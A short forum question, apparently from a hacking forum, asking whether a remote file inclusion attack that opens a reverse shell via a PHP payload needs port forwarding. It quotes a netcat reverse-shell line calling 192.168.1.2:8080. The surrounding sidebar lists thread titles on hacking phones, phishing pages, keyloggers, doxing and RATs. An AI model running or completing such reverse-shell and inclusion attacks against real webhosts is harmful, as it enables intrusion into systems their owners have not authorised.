Like we all know that remote file inclusion need to be write in php and upload to the webhost, then send to vulnerable page, to open reverse connection, so i wanna ask if this method need port fowarding, because in the php line where we put ("nc /bin/sh 192.168.1.2:8080") so do i need to port foward port 8080? thanks!
Forum Thread: Port Fowarding for Remote File Inclusion
- Hot
- Active
-
Metasploit Error: Handler Failed to Bind 40 Replies
5 days ago -
Forum Thread: How to Know if You Are a Script Kiddie? 9 Replies
1 wk ago -
Forum Thread: How to Identify and Crack Hashes 8 Replies
1 wk ago -
Forum Thread: How to Hack School Website 8 Replies
2 wks ago -
Forum Thread: Whenever I Try "Airmon-Ng Start wlan0" There's an Error? 16 Replies
2 wks ago -
Forum Thread: How to Fix 'Failed to Detect and Mount CD-ROM' Problem When Installing Kali Linux 14 Replies
2 wks ago -
Forum Thread: Awesome Keylogging Script - BeeLogger 30 Replies
3 wks ago -
Forum Thread: How to Hack Android Phone Using Same Wifi 27 Replies
3 wks ago -
Forum Thread: Complete Guide to Creating and Hosting a Phishing Page for Beginners 48 Replies
3 wks ago -
Forum Thread: Create and Use Android/Meterpreter/reverse_tcp APK with Msfvenom? 121 Replies
1 mo ago -
How to: Minecraft DoS'Ing with Python. 1 Replies
2 mo ago -
Forum Thread: HELP I Created an Apk for Hacking My Phone Using Kali Linux in Virtual Box How Can I Install That Apk on My Phone 17 Replies
2 mo ago -
Forum Thread: Tools for Beginner Hacker 3 Replies
2 mo ago -
Forum Thread: How to Embed an Android Payload in an Image? 9 Replies
2 mo ago -
Forum Thread: Metasploit reverse_tcp Handler Problem 46 Replies
3 mo ago -
Forum Thread: HACK ANDROID with KALI USING PORT FORWARDING(portmap.io) 11 Replies
3 mo ago -
Forum Thread: Fix Initramfs Problem 5 Replies
3 mo ago -
Forum Thread: Kali Wont Start, Stuck at Kali Login: 21 Replies
4 mo ago -
Forum Thread: How to View Your Child's What's App And Many More! 3 Replies
4 mo ago -
Forum Thread: Proxy Lists for Proxy Chains 1 Replies
5 mo ago
-
How To: Scan, Fake & Attack Wi-Fi Networks with the ESP8266-Based WiFi Deauther
-
How To: Top 10 Things to Do After Installing Kali Linux
-
How To: Find Identifying Information from a Phone Number Using OSINT Tools
-
How To: Check if Your Wireless Network Adapter Supports Monitor Mode & Packet Injection
-
How To: Use Burp & FoxyProxy to Easily Switch Between Proxy Settings
-
How to Hack Wi-Fi: Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
How To: Brute-Force Nearly Any Website Login with Hatch
-
How To: Dox Anyone
-
How To: Bypass File Upload Restrictions on Web Apps to Get a Shell
-
How To: Make Spoofed Calls Using Any Phone Number You Want Right from Your Smartphone
-
How To: Scan Websites for Interesting Directories & Files with Gobuster
-
How To: Easily Detect CVEs with Nmap Scripts
-
How To: Hack Apache Tomcat via Malicious WAR File Upload
-
How To: Run USB Rubber Ducky Scripts on a Super Inexpensive Digispark Board
-
How To: Crack Any Master Combination Lock in 8 Tries or Less Using This Calculator
-
How To: An Intro to Vim, the Unix Text Editor Every Hacker Should Be Familiar With
-
Android for Hackers: How to Backdoor Windows 10 Using an Android Phone & USB Rubber Ducky
-
How To: Setup Dendroid (Android RAT)
-
How To: Conduct Recon on a Web Target with Python Tools
-
How To: Gain SSH Access to Servers by Brute-Forcing Credentials
Be the First to Respond
Share Your Thoughts